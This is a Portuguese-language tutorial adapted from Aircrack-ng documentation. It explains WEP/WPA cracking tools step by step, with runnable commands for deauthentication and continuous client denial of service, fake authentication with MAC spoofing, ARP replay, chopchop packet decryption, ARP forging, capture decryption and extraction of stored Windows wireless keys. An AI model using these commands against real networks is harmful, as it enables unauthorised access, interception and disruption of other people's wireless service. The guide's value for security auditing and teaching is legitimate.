Este documento foi modificado (adaptado) do original em ingês e também do já adaptado em espanhol e traduzido para o Português (Brasileiro) por Marcelo Ferreira (
http://www.mundowifi.com.br)
Agradeço ao pessoal do Site Seguridad Wireless por ter me dado a oportunidade de referenciar-me a versão em espanhol e ao pessoal do próprio Site AircrackNG pela versão em inglês.
Os arquivos de captura podem estar em formato cap ou ivs.
Opções para nova versão 0.6
ivstoolsEste é um utilitário muito bom que serve para:
1º) Unir arquivos iv's em um só com o seguinte comando:
ivstools --merge captura1.ivs captura2.ivs captura3.ivs arquivofinal.ivs
sendo captura(s) os arquivos que queremos juntar e arquivofinal o resultado da união dos anteriores
2º)Para converter um arquivo com extensão cap em iv's:
ivstools --captura.cap arquivofinal.ivs
makeivs
É um utilitário que nos permite criar um arquivo com a extensão ivs com a chave que lhe adicoinamos (serve somente para teste)
makeivs.exe captura.ivs 866578388f517be0b4818a0db1
sendo captura o arquivo criado e 866578388f517be0b4818a0db1 a chave criada
Airmon-ngServe para colocar nossa placa wireless em modo monitor. Antes de começar a capturar o tráfego devemos colocar nossa placa wireless em modo monitor usando este script:
airmon-ng [canal]
start: para ativar o modo monitor.
stop: para parar o modo monitor.
dispositivo: nossa placa wireless (ath0, eth0, raw0.....)
Airodump-ngDescrição
Usado para capturar dados transmitidos através do protocolo 802.11 e em particular para a capturar e coletar IV's (vetores iniciais) dos pacotes WEP com a intensão de usar o aircrack-ng para recuperar a chave WEP. Caso exista um receptor GPS conectado ao computador onde o airodump-ng está rodando, este mostrará as coordenadas do AP.
UsoAntes de usá-lo você terá que inicializar o script airmon-ng para mostrar os dispositivos wireless existentes em sua máquina e assim ativar o modo monitor. Você até pode, mas não é recomendado executar o Kismet com airodump ao mesmo tempo.
airodump-ng [opção]
OPÇÕES:
--ivs: Captura somente iv's
--gpsd: Para usar um dispositivo GPS
--write :cria um arquivo com o nome escolhido e com a extensão(.cap ou .ivs) e começa a capturar.
-w: é o mesmo que --write
--beacons: Guarda os beacons (não é guardado por padrão).
Por padrão o airodump captura todos os canais que se encontram dentro da frequência de 2,4 GHz.
--channel :Captura o canal especificado
--c: O mesmo que --channel
-a: Captura na frequência de 5Ghz específica da banda A
--abg: Captura tanto em frequências de 2,4Ghz como em 5 Ghz
Para configurar correctamente os comandos devemos seguir a ordem em que estão escritos neste texto e omitir o comando que não devemos modificar:
Exemplos:airodump-ng --ivs -w teste -c 11 -abg ath0
captura somente iv's criando um arquivo chamado teste no canal 11 nas bandas a/b/g
airodump-ng -w teste -c 11 -abg ath0
captura criando um arquivo cap chamado teste no canal 11 nas bandas a/b/g
*Airodump oscila entre WEP e WPA.
Ocorre quando seu controlador wireless não rejeita pacotes corrompidos (aqueles com CRC inválido). Se for um ipw2100 (Centrino b), não tem ajuste; melhor comprar uma placa melhor. Caso seja uma Prism2, tente atualizar o firmware.
*Qual o significado dos campos mostrados pelo airodump?
airodump-ng mostrará uma lista com alguns Access Points detectados, e também uma lista de clientes conectados ("stations").
Aireplay-ngCom este utilitário conseguimos realizar 5 diferentes ataques:
Ataque 0: Desautenticação
Ataque 1: Autentificação falsa
Ataque 2: Seleção interativa do pacote a enviar
Ataque 3: Reinjeção de requisição ARP
Ataque 4: O chamado "chopchop" de KoreK (predicção de CRC)
Ataque 0: DesautenticaçãoEste ataque pode ser utilizado para vários propósitos:
*Capturar o Handshake WPA
Para isto devemos colocar o seguinte comando:
aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
0 significa desautenticação de cliente que serve para fazê-lo voltar a se associar ao Access Point que estava associado, fazendo com que faça um novo arp request e assim voltando também a enviar um novo handshake.
-a 00:13:10:30:24:9C Seria o AP
-c 00:09:5B:EB:C5:2B Seria uma "Station" asociada a esse AP. Se omitimos esta última parte o ataque se realiza sobre todas as "Stations" conectadas a esse AP.
ath0 É nossa placa wireless (chip atheros).
*Reinjeção ARP
aireplay-ng -0 10 -a 00:13:10:30:24:9C ath0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
como podemos observar o primeiro comando é uma desautenticação seguida de uma reinjeção dos pacotes obtidos.
-b 00:13:10:30:24:9C Seria o AP
-h 00:09:5B:EB:C5:2B Seria o cliente
*Recusa os serviços dos clientes conectados
Baseado em contínuos pacotes de desautenticação com a consequente impossibilidade do cliente conectar-se a ele mesmo.
aireplay-ng -0 0 -a 00:13:10:30:24:9C ath0
0 faz com que envie pacotes continuamente a qualquer "Station" conectado a esse AP. Se quisermos somente um em particular enviamos o seguinte comando:
aireplay-ng -0 0 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
Ataque 1: Autenticação falsa
Este ataque somente tem êxito quando necessitamos de um cliente associado ao AP para realizar os ataques 2, 3, 4 (opção -h) quando não temos. Por isto criamos para nós mesmos um cliente que se asociará a este AP. É preciso lembrar que se sempre é melhor quando se tem um verdadeiro cliente conectado ao AP pois este método não gera tráfego ARP.
Recomenda-se que antes de realizar este ataque troquemos o MAC Address de nossa placa wireless para que esta envie corretamente os ACKs (pedidos).
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
Uma vez realizado, lançamos o ataque da seguinte forma:
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
'the ssid' sem as aspas é o nome do AP 00:11:22:33:44:55 Cliente falso
Com os patches do CVS 2005-08-14 madwifi, é possível injetar pocotes estando em modo Infraestrutura (a chave WEP em sí não importa, com tanto que o AP aceite autenticação aberta). Razão pela qual, ao invés de usar o ataque 1, pode somente associar e injetar / monitorar através da interface athXraw:
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6
Então pode executar o ataque 3 ou o 4 (abaixo, aireplay substituirá automaticamente ath0 por ath0raw):
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0
Este ataque mencionado anteriormente pode muitas vezes falhar uma vez que não é 100% seguro por não ter sido muito utilizado.
Alguns Access Points requerem reautenticação a cada 30 segundos, caso contrário nosso cliente falso será desconectado. Neste caso utilizaremos um atraso de reautenticação periódica:
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
se em vez de 30 segundos queremos 20 colocamos 20 se for 10 modificamos por 10 e assim sucessivamente
Caso este ataque não seja bem sucedido (aireplay continua enviando pacotes de pedido de autenticação), pode ser que esteja usando filtro de MAC Address. Verifique o seguinte também:
Está com o controlador corretamente instalado e com os patches devidamente aplicados.
A placa wireless está configurada no mesmo canal que o Access Point.
O BSSID e o ESSID (opções -a / -e) são as corretas. Se for Prism2, verifique se o firmware está atualizado.
Ataque 2: Seleção interativa do pacote a enviarEste ataque lhe permite eleger um dado pacote para reenviá-lo; as vezes proporciona resultados mais efetivos que o ataque 3 (reinjeção automática de ARP).
Poderia usá-lo, por exemplo, para experimentar o ataque "redifundir quaisquer dados", no qual só funciona se o AP realmente reencripta os pacotes de dados WEP:
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B
-c FF:FF:FF:FF:FF:FF ath0
Também pode usar o ataque 2 para reenviar manualmente pacotes de pedidos ARP encriptados com WEP, cujo tamanho é ou 68 ou 86 bytes (dependendo do sistema operacional):
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841
-h 00:09:5B:EB:C5:2B ath0
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841
-h 00:09:5B:EB:C5:2B ath0
Outra boa idéia seria capturar uma certa quantidade de tráfego e verificar com o ethereal.
Ataque 3: Reinjeção de requisição ARP O clássico ataque de reinjeção de requisição ARP é o mais efetivo para generar novos IV's, e funciona de forma muito eficaz. Você precisa do MAC Address de um cliente asociado (00:09:5B:EB:C5:2B), ou o de um cliente falso como mostrado no ataque 1 (00:11:22:33:44:55). Pode ser que tenha que esperar alguns minutos, ou mais, até que apareça uma requisição ARP; este ataque falhará se não houver tráfego.
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
O "chopchop" de KoreK (predicção de CRC)
Este ataque, quando bem sucedido, pode desencriptar um pacote de dados WEP sem conhecer a chave. Também pode funcionar com WEP dinâmica.
Este ataque não recupera a chave WEP em sí mesma, apenas revela o que está no texto plano. De qualquer maneira, a maioria dos Access Points não são absolutamente vulneráveis. Alguns podem a princípio parecerem vulneráveis mas na realidade jogam os pacotes menores de 60 bytes. Se o AP joga pacotes menores de 42 bytes o aireplay passa a advinhar o resto da combinação que falta, assim que o header tornar-se predictível. Se um pacote IP é capturado automáticamente busca o checksum do header
depois de ter advinhado as partes que faltavam. Este ataque requer um mínimo de pacotes WEP (encriptado).
1. Primeiro, desencriptamos um pacote:
aireplay-ng -4 ath0
Se falhar, é porque o AP precisa de um cliente com o MAC Address específico filtrado neste AP. Nestes casos devemos usar um MAC Address de um cliente que está conectado e que tenha permissão (MAC filtrado ativado).
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0
2. Vamos dar uma olhada no endereço IP:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
3. Agora, forjamos uma requisição ARP.
O IP inicial não importa (192.168.1.100), mas o IP de destino (192.168.1.2) deve responder as requisições ARP. O MAC Address inicial deve corresponder a uma "Station" associada.
arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B
192.168.1.100 192.168.1.2 arp.cap
4. E reenviamos nossa requisição ARP forjada:
aireplay-ng -2 -r arp.cap ath0
Airdecap-ng
Serve para desencriptar os pacotes capturados uma vez obtidas as chaves seja elas WEP ou WPA
airdecap-ng [opções]
Exemplos:
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
airdecap-ng -e 'the ssid' -p passphrase tkip.cap
Wzcook
Serve para recuperar as chaves WEP do utilitário Wireless Zero Configuration do Windows XP. Por enquanto este utilitário Wzcook é experimental, portanto pode ser que funcione, pode ser que não funcione, dependendo do nível de Service Pack que se tenha aplicado.
WZCOOK mostrará o PMK (Pairwise Master Key), um valor de 256-bits que é o resultado de se codificar 8192 vezes a senha junto com o ESSID e o tamanho do ESSID. A senha em sí não se pode recuperar -- de qualquer maneira, basta conhecer o PMK. Para conectar a uma rede sem fio protegida com WPA usaremos o wpa_supplicant. Teu arquivo de configuração wpa_supplicant.conf deverá estar assim:
network={
ssid="my_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
Se não usa o WZC mas usa o utilitário USR, acesse pelo Registry usando o regedit:
HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1
Como fazer funcionar adaptadores USB com chip RaLink rt2570
Caso possua um adaptador de rede sem fio USB com chip rt2570 (D-Link DWL-G122 rev. B1 ou Linksys WUSB54G v4) deverá baixar os novos drivers na URL
www.tu-darmstadt.de para poder fazer funcionar com o Aircrack-ng em modo monitor e reinjeção de pacotes.
Descompacte e instale os drivers usando os seguintes comandos:
tar xfj rt2570-k2wrlz-1.3.0.tar.bz2
cd rt2570-k2wrlz-1.3.0/Module
make
make install
O último passo é acessar como root. De um su para trocar para root. Agora carregaremos o módulo no kernel:
modprobe rt2570
Muito bem agora insira o adaptador USB que provavelmente será reconhecida como rausb0. Execute um iwconfig verificar se o que falei está mesmo correto :-)
A partir daqui tudo será igual ao das outras placas, a única diferença é que esta terá o nome rausb0.
Bem pessoal espero que este documento ajude um pouco pois foi um trampo escrever tudo isso, sem contar as traduções que tive que pegar um pouco em inglês e outro pouco em espanhol
wireless.com.pt :: Movimento Wireless Português
